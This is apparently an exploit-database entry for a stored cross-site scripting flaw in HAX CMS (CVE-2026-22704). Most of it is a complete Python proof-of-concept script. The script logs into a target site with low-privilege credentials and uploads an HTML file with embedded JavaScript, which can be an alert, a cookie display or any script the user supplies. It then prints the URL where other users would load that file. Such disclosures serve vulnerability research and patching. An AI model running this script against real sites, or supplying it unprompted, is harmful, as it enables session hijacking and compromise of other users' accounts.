HAX CMS 24.x - Stored Cross-Site Scripting (XSS)

# Exploit Title: HAX CMS 24.x - Stored Cross-Site Scripting (XSS)
# Date: 2026-01-28
# Google Dork: "N/A"
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Vendor Homepage: https://www.drupal.org/project/hax
# Software Link: https://github.com/elmsln/haxcms
# Version: <= 24.x (tested)
# Tested on: Linux
# CVE: CVE-2026-22704
#
# Description:
# HAX CMS allows low-privileged authenticated users to upload HTML files
# without proper content sanitization. Uploaded HTML files are rendered
# directly by the application, leading to a Stored Cross-Site Scripting (XSS)
# vulnerability when accessed by other users.
#
#
# Usage:
#   python3 haxcms_stored_xss.py --target http://TARGET --user USER --password PASS
#


import argparse
import requests
from urllib.parse import urljoin


def create_poc_html(payload_type="alert"):
    """
    Generate HTML PoC file.
    Payload types:
      - alert  : simple JS alert (default)
      - cookie : cookie access demonstration
      - custom : user supplied JavaScript
    """

    if payload_type == "cookie":
        js_payload = """
        alert("PoC: document.cookie = " + document.cookie);
        """
    elif payload_type == "alert":
        js_payload = """
        alert("Stored XSS PoC - CVE-2026-22704");
        """
    else:
        js_payload = payload_type

    return f"""<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <title>PoC</title>
</head>
<body>
  <h2>HAX CMS Stored XSS PoC</h2>
  <script>
  {js_payload.strip()}
  </script>
</body>
</html>
"""


def upload_file(target, username, password, filename, content):
    session = requests.Session()

    login_url = urljoin(target, "/user/login")
    login_data = {
        "name": username,
        "pass": password,
        "form_id": "user_login_form",
        "op": "Log in"
    }

    print("[*] Logging in...")
    r = session.post(login_url, data=login_data, allow_redirects=True)

    if "log out" not in r.text.lower():
        print("[!] Login failed")
        return False

    print("[+] Login successful")

    upload_url = urljoin(target, "/files/upload")
    files = {
        "files[upload]": (filename, content.encode(), "text/html")
    }

    print("[*] Uploading HTML file...")
    r = session.post(upload_url, files=files)

    if r.status_code not in (200, 201, 302):
        print("[!] Upload failed")
        return False

    file_url = urljoin(target, f"/sites/default/files/{filename}")
    print("[+] File uploaded successfully")
    print("[+] PoC URL:")
    print(file_url)

    return True


def main():
    parser = argparse.ArgumentParser(description="HAX CMS Stored XSS PoC (CVE-2026-22704)")
    parser.add_argument("--target", required=True, help="Target base URL")
    parser.add_argument("--user", required=True, help="Low privilege username")
    parser.add_argument("--password", required=True, help="Password")
    parser.add_argument("--payload", default="alert",
                        choices=["alert", "cookie", "custom"],
                        help="PoC payload type")
    parser.add_argument("--filename", default="poc.html",
                        help="Uploaded file name")

    args = parser.parse_args()

    if args.payload == "custom":
        js = input("[?] Enter custom JavaScript payload:\n> ")
        html = create_poc_html(js)
    else:
        html = create_poc_html(args.payload)

    upload_file(
        args.target.rstrip("/"),
        args.user,
        args.password,
        args.filename,
        html
    )


if __name__ == "__main__":
    main()